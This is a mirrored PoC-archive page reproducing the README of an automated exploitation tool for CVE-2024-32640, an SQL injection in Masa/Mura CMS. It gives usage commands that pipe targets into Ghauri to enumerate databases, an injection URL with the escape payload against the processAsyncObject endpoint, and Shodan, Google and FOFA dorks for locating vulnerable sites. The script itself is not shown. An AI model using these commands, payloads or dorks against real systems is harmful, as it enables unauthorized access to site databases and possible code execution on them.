Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-32640 PoC — MasaCMS SQL Injection vulnerability

Source
https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS
Associated Vulnerability
Title:MasaCMS SQL Injection vulnerability (CVE-2024-32640)
Description:MASA CMS is an Enterprise Content Management platform based on open source technology. Versions prior to 7.4.5, 7.3.12, and 7.2.7 contain a SQL injection vulnerability in the `processAsyncObject` method that can result in remote code execution. Versions 7.4.5, 7.3.12, and 7.2.7 contain a fix for the issue.
Description
CVE-2024-32640 | Automated SQLi Exploitation PoC
Readme
# Muraider - Automating the detection & Exploitation of CVE-2024-32640 \ SQLi in Mura/Masa CMS

# Usage

## Detection:
`python3 CVE-2024-32640.py --url https://target.com/`

## Ghauri Exploitation (Pass '-g' or '--ghauri' as argument):

Parse in any arguments that you wish to use with Ghauri, following their argument list:

`python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"`

`python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"`

# Example

![image](https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS/assets/60468836/c728db35-ece0-4ef2-9980-534be54def07)

# Ghauri SQLI Auotmation:

Using the detection that I've implemented into the tool, we can then use the vulnerable target to exploit in Ghauri. The script automates this process, parsing all the target information needed into a call to Ghauri.

![image](https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS/assets/60468836/afbc4b6f-2310-48c2-b9b1-9cd2039be1ab)


# Details

By appending an escape sequence (`%5c`) to the contenthisid HTML Query Parameter value, we're able to verify if a target is vulnerbale to this SQLi. 

Successful exploitation could lead to unauthorized access to sensitive data.

URL: `https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x`

# Dorks

Shodan-query: `'Generator: Masa CMS'`

Google: `"powered by Mura CMS"`

FOFA: `app="Mura-CMS"`

# References:

https://twitter.com/HunterMapping/status/1790620695371911388

https://www.seebug.org/vuldb/ssvid-99835
File Snapshot

 [4.0K]  /data/pocs/a94695ac1d50dab7f9f4aeb0dc6f730adfee4a5f
├── [4.9K]  CVE-2024-32640.py
└── [1.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →